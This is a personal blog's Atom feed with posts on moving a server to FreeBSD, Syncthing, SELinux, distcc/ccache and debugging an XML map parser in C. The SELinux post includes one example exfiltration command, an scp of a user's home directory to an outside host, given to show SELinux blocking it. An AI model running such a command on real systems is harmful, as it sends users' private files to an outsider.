<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://www.gymli.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://www.gymli.org/" rel="alternate" type="text/html" /><updated>2025-08-29T00:28:16-05:00</updated><id>https://www.gymli.org/feed.xml</id><title type="html">/dev/urandom</title><subtitle>Open source stuffs from Danny Holman</subtitle><author><name>Danny Holman</name></author><entry><title type="html">Moving to FreeBSD</title><link href="https://www.gymli.org/2025/08/29/Moving-to-FreeBSD.html" rel="alternate" type="text/html" title="Moving to FreeBSD" /><published>2025-08-29T00:00:00-05:00</published><updated>2025-08-29T00:00:00-05:00</updated><id>https://www.gymli.org/2025/08/29/Moving-to-FreeBSD</id><content type="html" xml:base="https://www.gymli.org/2025/08/29/Moving-to-FreeBSD.html"><![CDATA[<p>Recently, my server had a major outage caused partially by my own inexperience
as well as some key failures in some key pieces of software I use. But like any
good developer, I’m going to place blame upon the OS, specifically apt (not
really, but I have to for the bit).</p>

<h3 id="what-happened">What happened?</h3>

<p>Well, Debian 13 Trixie just released to mass acclaim (I should know, because I’m
a big fan of Debian on servers), and I was in the midst of making a transition
plan to upgrade my install. However, what had started out as a simple learning
experience in a VM quickly escalated into the solution to a five-alarm fire of
my own making.</p>

<p>By default, Debian does not allow users to install packages outside of the
version of Debian that they have installed. I needed to get around this issue due
to a compiler version mismatch on my main build server I use to speed up
compiling C (see my post on distcc and ccache for details on getting that setup).
So I decided to modify apt’s pin configuration to only install select packages
from unstable (specifically GCC version 14 at the time). However, when Debian
made the packages from unstable available as Trixie packages, something in my
apt configuration caused a cascade of failures that resulted in something akin
to Debian having a stroke.</p>

<p>Firstly, the postfix server running on my server failed. I still do not know
what fully caused this outage, but without this key piece of infrastructure,
issues would compound before any notification on my end. Once the email server
was down, the email I would usually get notifying me of automatic upgrades would
never come, and therefore, apt did not send the email detailing the critical
errors quickly stacking up as the packages in unstable were shifted out into
Trixie. I believe this is where the apt pin preferences was updated, causing the
rest of Trixie to be pulled into my Debian Bookworm install. Apt failed soon
after, as the apt sources file no longer matched the currently running OS.</p>

<p>Once I noticed that my email server wasn’t responding, I was able to login and
see the damage. The entire OS had to be reinstalled from scratch, and just two
days before starting a new job, meaning I had no email, no calendar, and no VPN
back to the house.</p>

<h3 id="sonew-debian-version">So…new Debian version?</h3>

<p>Not quite. You see, while Debian was quietly lighting itself on fire, I was
playing with a FreeBSD virtual machine instance. I had zero intention of moving
anything to it just yet (had that experience with my laptop, and, oh boy, were
there some show-stopping bugs). However, I quickly fell in love with the level
of polish and support FreeBSD has, and I was seriously considering moving to it
instead of upgrading to Trixie just for the learning experience and to see if it
was up to snuff to power the services I need.</p>

<p>It had it all: sane defaults, ports packages that I can customize to the third
degree, a ZFS version that actual works; and I was enamoured after only about an
hour of using the VM. However, the graphics drivers aren’t quite up to par for my
standards, though they are extremely high quality. Fortunately, I wasn’t planning
on using it to play games and render graphics, I was going to use it completely
for work.</p>

<p>The server I have at home now rocks FreeBSD 14.3, and I could not be happier
about it.</p>

<h3 id="final-thoughts">Final thoughts</h3>

<p>If you’re any kind of sysadmin or Unix developer, you need to give FreeBSD a
try if you haven’t already. It has changed my personal views on what a Unix
system should be in very positive ways, and I will definitely be staying with
it on my server. However, you might want to check the hardware compatibility
on the FreeBSD wiki or check with sites like <a href="http://bsd-hardware.info">this one</a>
before taking the plunge on a personal system.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[Recently, my server had a major outage caused partially by my own inexperience as well as some key failures in some key pieces of software I use. But like any good developer, I’m going to place blame upon the OS, specifically apt (not really, but I have to for the bit).]]></summary></entry><entry><title type="html">Syncthing Addiction</title><link href="https://www.gymli.org/2023/04/12/Syncthing-Addiction.html" rel="alternate" type="text/html" title="Syncthing Addiction" /><published>2023-04-12T00:00:00-05:00</published><updated>2023-04-12T00:00:00-05:00</updated><id>https://www.gymli.org/2023/04/12/Syncthing-Addiction</id><content type="html" xml:base="https://www.gymli.org/2023/04/12/Syncthing-Addiction.html"><![CDATA[<p>I must admit something: I have become hopelessly addicted to
<a href="https://syncthing.net">Syncthing</a>. This tool has saved my bacon the last few
weeks with both regular work as well as personal projects, and it has become my
go-to tool for backing up large collections of files.</p>

<h3 id="how-it-works">How it works</h3>

<p>Syncthing works very well out of the box, but it has endless ways of tailoring
it for a particular scenario. In the default configuration, there is a main
directory that it adds to its tracking information called <code class="language-plaintext highlighter-rouge">~/Sync</code>. In the main
configuration page, which can be found at http://localhost:8384/, all it needs
is a machine ID which can be found in the admin page of the other system. Like
magic, it will start syncing across the internet with the other machine, even
across firewalled networks. In the default configuration it uses public relay
servers for this task and, while reliable, it is a tad bit slow for me. So,
I’ve added my own server as a direct connection. This way, I also get the added
bonus of having everything I need in a central point and all I need to access
it is to point a syncthing instance at its public IP address.</p>

<p><img src="/assets/syncthing_admin.png" alt="Admin Page" /></p>

<h3 id="why-not-nextcloud">Why not Nextcloud?</h3>

<p>In my testing, I have found Nextcloud and other such solutions a bit
heavy-handed for my particular use case, or in some areas, lacking basic
features. For instance, the Nextcloud app on Android tried to be everything and
the kitchen sink: image viewer, music player, encryption manager and all kinds
of functionality I would never make use of and cannot remove. These features,
while I’m sure some found useful, I did not and they took precious space on my
rather meager 16 gigabyte Samsung at the time. On my new devices, this is much
less of a concern but I do still enjoy an app to follow the Unix principle.
Syncthing is <em>just</em> a file synchronization tool, and that’s all I need it to do.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[I must admit something: I have become hopelessly addicted to Syncthing. This tool has saved my bacon the last few weeks with both regular work as well as personal projects, and it has become my go-to tool for backing up large collections of files.]]></summary></entry><entry><title type="html">Demystifying SELinux</title><link href="https://www.gymli.org/2021/09/07/Demystifying-SELinux.html" rel="alternate" type="text/html" title="Demystifying SELinux" /><published>2021-09-07T00:00:00-05:00</published><updated>2021-09-07T00:00:00-05:00</updated><id>https://www.gymli.org/2021/09/07/Demystifying-SELinux</id><content type="html" xml:base="https://www.gymli.org/2021/09/07/Demystifying-SELinux.html"><![CDATA[<p>I think a lot of people involved in the Linux space, both devs and regular
users, have a hard time with SELinux. Just last week I was showing some of my
personal server’s security to a colleague and I could see the look of sheer
“This is above my pay-grade” all over his face.</p>

<h3 id="yes-its-an-nsa-thing">Yes it’s an NSA thing</h3>

<p>Before we go further, I have to answer one question: yes, it was developed by
the NSA. As most security researchers and other people “in the know” have
pointed out, <a href="https://www.eff.org/deeplinks/2012/07/why-nsa-cant-be-trusted-run-us-cybersecurity-programs">the NSA cannot be trusted with most things</a>.
But this is one of several notable exceptions to that rule, and even Linus has
defended them on this one.</p>

<h3 id="security-labels">Security Labels</h3>

<p>SELinux works by attaching “security labels” to files and directories on the
file system as metadata. For instance doing a <code class="language-plaintext highlighter-rouge">ls -lZ</code> command on my web server
home directory looks like this</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    # ls -lZ /var/www/*
    drwxr-xr-x. 4 git  www-data system_u:object_r:httpd_sys_content_t:s0      4096 Nov 17  2020 2020
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      1654 Apr  6 14:52 404.html
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      2779 Apr  6 14:52 about.html
    drwxr-xr-x. 6 git  www-data system_u:object_r:httpd_sys_content_t:s0      4096 Apr  6 14:52 assets
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0     20564 Apr  6 14:52 feed.xml
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      2622 Apr  6 14:52 index.html
    -rw-r--r--. 1 root root     unconfined_u:object_r:httpd_sys_content_t:s0   612 Jun 24 14:44 index.nginx-debian.html
    drwxr-xr-x. 3 git  www-data system_u:object_r:httpd_sys_content_t:s0      4096 Apr  8  2020 oss
    -rw-r--r--. 1 git  www-data system_u:object_r:httpd_sys_content_t:s0      1890 Apr  6 14:52 projects.html
</code></pre></div></div>

<p>As you can see, the security context is a colon-delimited list. The <code class="language-plaintext highlighter-rouge">system_u</code>,
<code class="language-plaintext highlighter-rouge">object_r</code>, and <code class="language-plaintext highlighter-rouge">s0</code> parts aren’t used in the targeted policy (which I use).
Those are used in the multi-level security (MLS) policy, and it adds much more
complexity than is required for most use cases. For the target policy only the
“type” portion is ever used.</p>

<p>These labels are attached to the file system on initial setup of SELinux by
running <code class="language-plaintext highlighter-rouge">touch /.autorelabel</code> and making sure <code class="language-plaintext highlighter-rouge">security=selinux selinux=1</code> is
appended to the kernel command line, see your bootloader documentation for that.
You can change them either rerunning that command and rebooting or by using the
<code class="language-plaintext highlighter-rouge">restorecon</code> or <code class="language-plaintext highlighter-rouge">chcon</code> commands, see the relevant manpage for details.</p>

<h3 id="type-enforcement">Type Enforcement</h3>

<p>This is where most people <em>really</em> start to get confused. On every access of
any file in the file system, the kernel <em>still</em> checks UNIX permissions, i.e.
the <code class="language-plaintext highlighter-rouge">rwx</code> bits in the file metadata. If the permission bits don’t allow
something, SELinux won’t allow it either. Not very interesting, right? The
interesting part begins when a user, <code class="language-plaintext highlighter-rouge">alice</code> has some data that might be
classified or read-only and decides, maybe out of frustration, to <code class="language-plaintext highlighter-rouge">chmod 777</code>
her entire home directory. Most Linux and Unix heads are probably exploding upon
reading that, but this where SELinux can really save your bacon. Because when
a system process has a vulnerability that allows arbitrary code execution and
tries to run a shell command such as:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ scp -r ~alice www.data-hack.net
    cp: cannot stat '/home/alice': Permission denied
</code></pre></div></div>

<p>This is due to the kernel detecting a type mismatch, i.e. it detects the
process running with <code class="language-plaintext highlighter-rouge">httpd_t</code> cannot access files with the type <code class="language-plaintext highlighter-rouge">user_home_t</code>.</p>

<p>In addition, all of these errors are logged by the audit daemon, <code class="language-plaintext highlighter-rouge">auditd</code> and
placed in <code class="language-plaintext highlighter-rouge">/var/log/audit/audit.log</code> for you to examine later.</p>

<h3 id="fixing-errors">Fixing Errors</h3>

<p>The first step to take when fixing a permission error, and you <em>know</em> the
permission bits are set correctly, is to check the audit logs with the command
<code class="language-plaintext highlighter-rouge">ausearch -c &lt;command_name&gt; | audit2why</code>. This command string searches the audit
logs for the command <code class="language-plaintext highlighter-rouge">&lt;command_name&gt;</code> and feeds the results into <code class="language-plaintext highlighter-rouge">audit2why</code>
which translates them into a more human readable format. This command will tell
you exactly what to do to fix the error, whether it be <code class="language-plaintext highlighter-rouge">setsebool -P &lt;bool_name&gt;</code>
or <code class="language-plaintext highlighter-rouge">ausearch -c &lt;command_name&gt; | audit2allow -M &lt;command_name&gt;Local</code>.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[I think a lot of people involved in the Linux space, both devs and regular users, have a hard time with SELinux. Just last week I was showing some of my personal server’s security to a colleague and I could see the look of sheer “This is above my pay-grade” all over his face.]]></summary></entry><entry><title type="html">DistCC and CCache on Linux</title><link href="https://www.gymli.org/2020/11/16/Distcc-ccache-setup.html" rel="alternate" type="text/html" title="DistCC and CCache on Linux" /><published>2020-11-16T00:00:00-06:00</published><updated>2020-11-16T00:00:00-06:00</updated><id>https://www.gymli.org/2020/11/16/Distcc-ccache-setup</id><content type="html" xml:base="https://www.gymli.org/2020/11/16/Distcc-ccache-setup.html"><![CDATA[<p><img src="https://imgs.xkcd.com/comics/compiling.png" alt="xkcd knows this" /></p>

<p>After a project reaches a certain size, compiling the code becomes a task in and
of itself and is a source of wasted time the world over. Recently I started
looking at tools to reduce the amount of time I waste waiting on code to compile
and I found a few things that can help with that.</p>

<h3 id="ccache">ccache</h3>

<p>The first tool I found was something called <a href="https://ccache.dev">ccache</a>, and it
works almost like a web browser cache, i.e. it stores the output of every
compile operation I run in my home directory, and when I run the same job again
it recalls the same result.</p>

<p>All one needs to do to get it working is to either prefix every call to the
compiler with <code class="language-plaintext highlighter-rouge">ccache</code> or, and this is what I recommend, prefix your PATH
environment variable with <code class="language-plaintext highlighter-rouge">/usr/lib/ccache/bin</code>. I just have a line in my
<code class="language-plaintext highlighter-rouge">.zshenv</code> file that does just that:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    export PATH="/usr/lib/ccache/bin:$PATH"
</code></pre></div></div>

<p>Now be warned, the first run with a large project will take <em>longer</em> than a
run without ccache enabled. The reason for this is that it has to build its
internal cache which takes some amount of time between calls to the compiler.</p>

<p>You can check the ccache statistics with the command <code class="language-plaintext highlighter-rouge">ccache -s</code>. Here’s an
example:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ ccache -s
    cache directory                     /home/dholman/.ccache
    primary config                      /home/dholman/.ccache/ccache.conf
    secondary config      (readonly)    /etc/ccache.conf
    stats updated                       Fri Nov  6 13:31:48 2020
    cache hit (direct)                 16980
    cache hit (preprocessed)            2373
    cache miss                         76011
    cache hit rate                     20.29 %
    called for link                     2154
    called for preprocessing            2603
    multiple source files                  2
    compiler produced stdout               4
    compiler produced empty output       652
    compile failed                       657
    preprocessor error                  1541
    bad compiler arguments               260
    unsupported source language           10
    autoconf compile/link               3087
    unsupported code directive           123
    could not write to output file       110
    no input file                       2858
    cleanups performed                    65
    files in cache                      6387
    cache size                         586.9 MB
    max cache size                      20.0 GB
</code></pre></div></div>

<h3 id="distcc">distcc</h3>

<p>The next tool was a bit more fiddly to get working and may or may not work for
everyone, so be warned. Also, in order to get any benefit out of this, you need
a separate computer attached to the same network as your development
workstation.</p>

<p>Distcc, according to the <a href="https://distcc.github.io">website</a>, is a distributed
compiler. That’s not <em>really</em> true, as it functions as an extension to the
existing compiler already running on my machine. In my case I have a Dell R710
dual Xeon system running in the basement, and I have distcc set up as a daemon
listening on TCP port 3632 on that system. Here’s an excerpt from
<code class="language-plaintext highlighter-rouge">/etc/default/distcc</code> allowing all hosts on my network to use it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    #
    # Which networks/hosts should be allowed to connect to the daemon?
    # You can list multiple hosts/networks separated by spaces.
    # Networks have to be in CIDR notation, f.e. 192.168.1.0/24
    # Hosts are represented by a single IP Adress
    #
    # ALLOWEDNETS="127.0.0.1"

    ALLOWEDNETS="127.0.0.1 192.168.1.0/24"
</code></pre></div></div>

<p>The next step was to install distcc on my workstation and configure it to use
the server downstairs as a slave:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    # --- /etc/distcc/hosts -----------------------
    # See the "Hosts Specification" section of
    # "man distcc" for the format of this file.
    #
    # By default, just test that it works in loopback mode.
    192.168.1.26/24,cpp,lzo
</code></pre></div></div>

<p>With all of this configured I could then build a project with
<code class="language-plaintext highlighter-rouge">make -j&lt;number of parallel jobs&gt; CC=distcc</code>. Here’s a few results from some of
my personal projects and other things.</p>

<p>Forge game engine:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ time make -j20 CC=distcc
    [ 23%] Building C object CMakeFiles/forge.dir/src/ui/button.c.o
    [ 23%] Building C object CMakeFiles/forge.dir/src/data/stack.c.o
    [ 23%] Building C object CMakeFiles/forge.dir/src/data/list.c.o
    [ 30%] Building C object CMakeFiles/forge.dir/src/ui/spinner.c.o
    [ 38%] Building C object CMakeFiles/forge.dir/src/ui/text.c.o
    [ 46%] Building C object CMakeFiles/forge.dir/src/engine.c.o
    [ 53%] Building C object CMakeFiles/forge.dir/src/ui/rect.c.o
    [ 61%] Building C object CMakeFiles/forge.dir/src/graphics.c.o
    [ 69%] Building C object CMakeFiles/forge.dir/src/input.c.o
    [ 76%] Building C object CMakeFiles/forge.dir/src/entity.c.o
    [ 92%] Building C object CMakeFiles/forge.dir/src/sprite.c.o
    [ 92%] Building C object CMakeFiles/forge.dir/src/tmx.c.o
    [100%] Linking C shared library libforge.so
    [100%] Built target forge
    make -j20 CC=distcc  0.03s user 0.02s system 97% cpu 0.046 total
</code></pre></div></div>

<p>Linux kernel with default config:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    $ time make -j20 CC=distcc
    ...
    Kernel: arch/x86/boot/bzImage is ready  (#1)
    make -j20 CC=distcc  463.45s user 116.23s system 120% cpu 8:01.29 total
</code></pre></div></div>

<p>Astute readers might notice that these results seem a little far-fetched for
<em>just</em> distcc alone, and they would be right. Because I set ccache to be called
<em>before</em> the compiler, distcc gets hooked into the call of ccache. I do not
recommend doing it the other way around and neither do the developers of ccache
and distcc. I also recommend <em>not</em> setting up distcc to be called on <em>every</em>
call to the compiler, as distributing source code over TCP/IP like this can
be a very time consuming process on sub-gigabit speed networks. One other thing
to note is that the compiler versions <em>must</em> match, or all calls to distcc will
fail.</p>

<p>One can look at what distcc is currently doing behind the scenes with
<code class="language-plaintext highlighter-rouge">distccmon-text &lt;refresh seconds&gt;</code>, or if a GUI interface is preferred, you can
use <code class="language-plaintext highlighter-rouge">distccmon-gnome</code>.</p>

<p><img src="/assets/distcc.png" alt="distcc monitor" /></p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Adventures in XML Parsing</title><link href="https://www.gymli.org/2020/02/09/Adventures-in-XML-Parsing.html" rel="alternate" type="text/html" title="Adventures in XML Parsing" /><published>2020-02-09T00:00:00-06:00</published><updated>2020-02-09T00:00:00-06:00</updated><id>https://www.gymli.org/2020/02/09/Adventures-in-XML-Parsing</id><content type="html" xml:base="https://www.gymli.org/2020/02/09/Adventures-in-XML-Parsing.html"><![CDATA[<p>I think pretty much everyone has realized at this point that XML is not very
easy to parse. With a little documentation and a helpful parsing library it
should be, at the very least, managable right?</p>

<p>That’s what I thought when I attempted to write a TMX parser for the first
time. I quickly found out how much of a pain it is to parse XML even with the
format documentation right in front of me and a robust library to work with.</p>

<h2 id="seemingly-random-blank-tags">Seemingly random blank tags</h2>

<p>I think the main issue with the XML standard is just how many quirks a file can
possibly have. Things like this:</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;doc&gt;</span>
        <span class="nt">&lt;element&gt;</span>data<span class="nt">&lt;/element&gt;</span>
        <span class="err">&lt;</span>- There's a blank tag here! -&gt;
        <span class="nt">&lt;element&gt;</span>more data<span class="nt">&lt;/element&gt;</span>
<span class="nt">&lt;/doc&gt;</span>
</code></pre></div></div>

<p>That blank tag counted for the whitespace that <em>supposedly</em> exists there. When
this is detected by LibXML2, a blank <code class="language-plaintext highlighter-rouge">&lt;text&gt;</code> tag is placed in between two,
otherwise valid, XML tags. Now when parsed by Python or Javascript or other
languages where pointers are essentially non-existant, this should never come
up. When parsed with a language like C however…well</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>zsh: segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>   ./test
</code></pre></div></div>

<p>So, like any good developer, I ran it under Valgrind, and soon discovered that
this is no ordinary memory fault.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">==</span><span class="nv">2373696</span><span class="o">==</span> Invalid <span class="nb">read </span>of size 8
<span class="o">==</span><span class="nv">2373696</span><span class="o">==</span>     by _parse_layer<span class="o">(</span>void<span class="k">*</span><span class="o">)</span>
<span class="o">==</span><span class="nv">2373696</span><span class="o">==</span>     at xmlStrEqual<span class="o">(</span>nodePtr<span class="k">*</span>, xmlChar<span class="k">*</span><span class="o">)</span>
<span class="o">==</span><span class="nv">2373696</span><span class="o">==</span>  Address 0x0 not stack<span class="s1">'d, malloc'</span>d or <span class="o">(</span>recently<span class="o">)</span> free<span class="s1">'d
</span></code></pre></div></div>

<p>Now at this point, I’m thinking “Wait the bug is in LibXML? That can’t be
right.” GDB, with liberal use of <code class="language-plaintext highlighter-rouge">bt</code> and <code class="language-plaintext highlighter-rouge">print</code> pointed at the same result:
that the bug resided with LibXML. None of this made sense in the slightest. Why
on earth would a professionally written software library that was essentially
a standard fixture on many Unix-like systems have a major memory bug in it? The
answer would not reveal itself until observing the program with hardware
watchpoints.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> watch <span class="k">*</span>node
Hardware watchpoint 2: <span class="k">*</span>node
<span class="o">(</span>gdb<span class="o">)</span>
...

Hardware watchpoing 2: node

Old value <span class="o">=</span> <span class="o">(</span>nodePtr <span class="k">*</span><span class="o">)</span> 0x5555...
New value <span class="o">=</span> <span class="o">(</span>nodePtr <span class="k">*</span><span class="o">)</span> 0x0
</code></pre></div></div>

<p>There you are! This was that pesky <code class="language-plaintext highlighter-rouge">&lt;text&gt;</code> tag. Apparently, any, and I do mean
<em>any</em>, whitespace detected by LibXML, including the space inserted by my level
editor, produces this strange <code class="language-plaintext highlighter-rouge">&lt;text&gt;</code> tag that seems to be there for no clear
reason. Three new helper functions and judicious use of
<code class="language-plaintext highlighter-rouge">nodePtr = nodePtr-&gt;next</code> later and that problem is solved.</p>

<h2 id="comma-separated-values-inside-xml-tags">Comma separated values <em>inside</em> XML tags</h2>

<p>XML can be a beast to parse, but CSV? I can parse that very easily using
standard library functions like <code class="language-plaintext highlighter-rouge">strtok</code>. The problem came when the values in
this list of values did not match the values inside the level editor.</p>

<p><img src="/assets/tiled.png" alt="Tiled Map Editor" /></p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;data</span> <span class="na">encoding=</span><span class="s">"csv"</span><span class="nt">&gt;</span>
49,50,50...50,51
97,
.
.
.
145,146...146,147
<span class="nt">&lt;/data&gt;</span>
</code></pre></div></div>

<p>That first tile in the upper left corner? It has a GID of 48 inside the
<em>editor</em>. In the <em>file</em>, it has GID of 49. This difference is not readily
apparent from the editor or the file itself unless you know its there. This
created the interesting case where my level looked pretty good in the editor but
looked like someone placed tiles seemingly at random when my engine loaded the
file into memory.</p>

<p><img src="/assets/wrong_gid.png" alt="" /></p>

<p>The documentation failed to mention this too, making this all the more difficult
to track down. Eventually, I did manage to figure out that when the tile GID is
extracted from the file to just decrement the value.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">ret</span><span class="o">-&gt;</span><span class="n">tile_gids</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">vals</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</code></pre></div></div>

<p>Thankfully, it didn’t require an hour worth of debugging inside GDB to find
this.</p>

<h2 id="conclusion">Conclusion</h2>

<p>I think that if you can get away with it, try to parse a binary file of your own
creation rather than try to parse an existing standard. Why binary? Because you
can more finely control how the data is formatted and parsing becomes a
non-issue thanks to the ease of use of a standard C <code class="language-plaintext highlighter-rouge">FILE</code> pointer. I think the
next thing I’ll do is write a script that converts these XML files into
something much more terse and less quirky.</p>]]></content><author><name>Danny Holman</name></author><summary type="html"><![CDATA[I think pretty much everyone has realized at this point that XML is not very easy to parse. With a little documentation and a helpful parsing library it should be, at the very least, managable right?]]></summary></entry></feed>